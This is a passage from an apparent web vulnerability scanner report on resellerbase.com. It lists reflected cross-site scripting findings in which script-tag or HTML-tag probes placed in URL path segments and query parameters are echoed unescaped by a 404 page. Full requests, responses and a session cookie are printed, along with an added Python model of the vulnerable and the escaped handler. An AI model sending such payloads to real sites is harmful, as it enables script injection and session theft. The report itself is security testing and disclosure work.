2.1783. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a398c<script>alert(1)</script>576f1a05cdf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themesa398c<script>alert(1)</script>576f1a05cdf/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themesa398c<script>alert(1)</script>576f1a05cdf/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1784. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3843<script>alert(1)</script>77f4bec3cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmosc3843<script>alert(1)</script>77f4bec3cc/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmosc3843<script>alert(1)</script>77f4bec3cc/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1785. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e9b14<script>alert(1)</script>638d3784f27 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/imagese9b14<script>alert(1)</script>638d3784f27/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/imagese9b14<script>alert(1)</script>638d3784f27/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1786. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1d57b<script>alert(1)</script>9c3c9d003c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/rating1d57b<script>alert(1)</script>9c3c9d003c/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating1d57b<script>alert(1)</script>9c3c9d003c/0.gif was not found on this server.</p>
...[SNIP]...

2.1787. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4af16<script>alert(1)</script>c2df711339d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/rating/0.gif4af16<script>alert(1)</script>c2df711339d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating/0.gif4af16<script>alert(1)</script>c2df711339d was not found on this server.</p>
...[SNIP]...

2.1788. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bb478<script>alert(1)</script>66462e2cb52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/rating/0.gif?bb478<script>alert(1)</script>66462e2cb52=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating/0.gif?bb478<script>alert(1)</script>66462e2cb52=1 was not found on this server.</p>
...[SNIP]...

2.1789. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78bed<script>alert(1)</script>5b9b98f1537 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail78bed<script>alert(1)</script>5b9b98f1537/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail78bed<script>alert(1)</script>5b9b98f1537/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1790. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4940f<script>alert(1)</script>9d914f23959 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/224940f<script>alert(1)</script>9d914f23959/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/224940f<script>alert(1)</script>9d914f23959/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1791. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 433a7<script>alert(1)</script>526cf8915b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes433a7<script>alert(1)</script>526cf8915b9/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes433a7<script>alert(1)</script>526cf8915b9/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1792. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ac27<script>alert(1)</script>1358b8fa979 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos3ac27<script>alert(1)</script>1358b8fa979/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos3ac27<script>alert(1)</script>1358b8fa979/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

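Every finding in this run reflects through the same sink: a custom 404 page that writes the requested URL, as received, into the text of a paragraph. The script below is an added illustration and not code from resellerbase.com or from the scanner; the real PHP handler is not on the page, so it is reconstructed from the one line the captured responses show, on the assumption that the handler echoes the raw request-target (PHP's $_SERVER['REQUEST_URI']). It models the vulnerable and the hardened handler, reproduces the scanner's "Certain" versus "Firm" rule over the probes taken from findings 2.1792 and 2.1796, and adds the check a reviewer should run before rating this exploitable from a link: Burp sends the angle brackets raw, whereas a browser percent-encodes them, so the outcome depends on whether the handler percent-decodes the target before echoing it, which these captures do not establish.

```python
"""Model of the reflection behind findings 2.1792 to 2.1811 of this report.

Added illustration, not code from resellerbase.com: the real PHP 404 handler
is not on the page, so it is reconstructed from the single line every
captured response shows,

    <p>The requested URL ... was not found on this server.</p>

on the assumption that the handler writes the raw request-target
(PHP's $_SERVER['REQUEST_URI']) straight into that paragraph.
"""
import html
from urllib.parse import quote, unquote

TEMPLATE = "<p>The requested URL {uri} was not found on this server.</p>"

# The two probes the report shows: the full script probe behind every
# "Certain" finding and the bare tag probe behind every "Firm" one.  Each is
# wrapped in a random prefix and suffix so the echo point can be located.
SCRIPT_PROBE = "<script>alert(1)</script>"
TAG_PROBE = "<a>"


def render_404_vulnerable(request_uri, urldecode_first=False):
    """The behaviour the report captured: the request-target is inserted
    into the paragraph without HTML-encoding.  urldecode_first models a
    handler that percent-decodes the target before echoing it (an
    assumption; the page does not show whether the real one does)."""
    uri = unquote(request_uri) if urldecode_first else request_uri
    return TEMPLATE.format(uri=uri)


def render_404_hardened(request_uri):
    """The fix for a text-between-tags sink: HTML-encode before echoing,
    i.e. htmlspecialchars($uri, ENT_QUOTES, 'UTF-8') in the PHP handler."""
    return TEMPLATE.format(uri=html.escape(request_uri, quote=True))


def browser_encode(request_target):
    """Approximation of what a browser sends for a link containing raw
    angle brackets: '<', '>' and '"' become %3C, %3E and %22 while URL
    delimiters and parentheses stay literal.  Burp sends the brackets raw,
    which is why the captured requests show them literally."""
    return quote(request_target, safe="/?=&.()")


def classify_reflection(body, prefix, probe, suffix):
    """Reproduce the scanner's confidence rule for one wrapped probe.
    certain          full script probe echoed byte-for-byte
    firm             only a bare tag echoed; script injection not proven
    html-encoded     echoed, but the brackets came back as &lt; and &gt;
    percent-encoded  echoed as %3C...%3E, inert as HTML
    none             marker not reflected at all"""
    if prefix + probe + suffix in body:
        return "certain" if probe == SCRIPT_PROBE else "firm"
    if prefix + html.escape(probe, quote=True) + suffix in body:
        return "html-encoded"
    if prefix + quote(probe, safe="/()") + suffix in body:
        return "percent-encoded"
    return "none"


def demo():
    """Run the classifier over the report's own capture and over the model."""
    # Request-target copied from finding 2.1792; the captured response line
    # is that target inside the 404 paragraph, exactly as the report shows it.
    raw = ("/detail/22/themes/kosmos3ac27<script>alert(1)</script>1358b8fa979"
           "/images/rating/search.php?keyword=search...&Submit3=Search&opt=2")
    captured = "<p>The requested URL " + raw + " was not found on this server.</p>"
    m = ("3ac27", SCRIPT_PROBE, "1358b8fa979")
    # Query-string value from finding 2.1796, where only <a> came back.
    firm_target = ("/detail/22/themes/kosmos/images/rating/search.php"
                   "?keyword=search...&Submit3=Searche899b<a>dd7cd6f56e7&opt=2")
    return {
        "captured 2.1792": classify_reflection(captured, *m),
        "model, raw brackets": classify_reflection(render_404_vulnerable(raw), *m),
        "model, hardened": classify_reflection(render_404_hardened(raw), *m),
        "model, browser-encoded, no decode":
            classify_reflection(render_404_vulnerable(browser_encode(raw)), *m),
        "model, browser-encoded, handler decodes":
            classify_reflection(render_404_vulnerable(browser_encode(raw), True), *m),
        "model, 2.1796 tag probe":
            classify_reflection(render_404_vulnerable(firm_target),
                                "e899b", TAG_PROBE, "dd7cd6f56e7"),
    }


if __name__ == "__main__":
    for label, verdict in demo().items():
        print(f"{label:42} {verdict}")
```

The "Firm" findings in this section (2.1796, 2.1797, 2.1799, 2.1806, 2.1807, 2.1809) are the query-string values, where the report shows only the bare tag probe coming back; the path segments and the parameter name all returned the full script probe. The classifier reproduces that split but not its cause, which has to be checked by hand against the real handler.
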
2.1793. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 97758<script>alert(1)</script>797f693f7a2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images97758<script>alert(1)</script>797f693f7a2/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images97758<script>alert(1)</script>797f693f7a2/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1794. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 54edd<script>alert(1)</script>878fa6ca9f7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/rating54edd<script>alert(1)</script>878fa6ca9f7/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating54edd<script>alert(1)</script>878fa6ca9f7/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1795. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c305e<script>alert(1)</script>d39470bd7a1 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/rating/search.phpc305e<script>alert(1)</script>d39470bd7a1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating/search.phpc305e<script>alert(1)</script>d39470bd7a1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1796. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e899b<a>dd7cd6f56e7 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searche899b<a>dd7cd6f56e7&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searche899b<a>dd7cd6f56e7&opt=2 was not found on this server.</p>
...[SNIP]...

2.1797. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 62c08<a>00cdc1afb1 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/images/rating/search.php?keyword=search...62c08<a>00cdc1afb1&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating/search.php?keyword=search...62c08<a>00cdc1afb1&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1798. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1c15c<script>alert(1)</script>fffc256d02b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&1c15c<script>alert(1)</script>fffc256d02b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
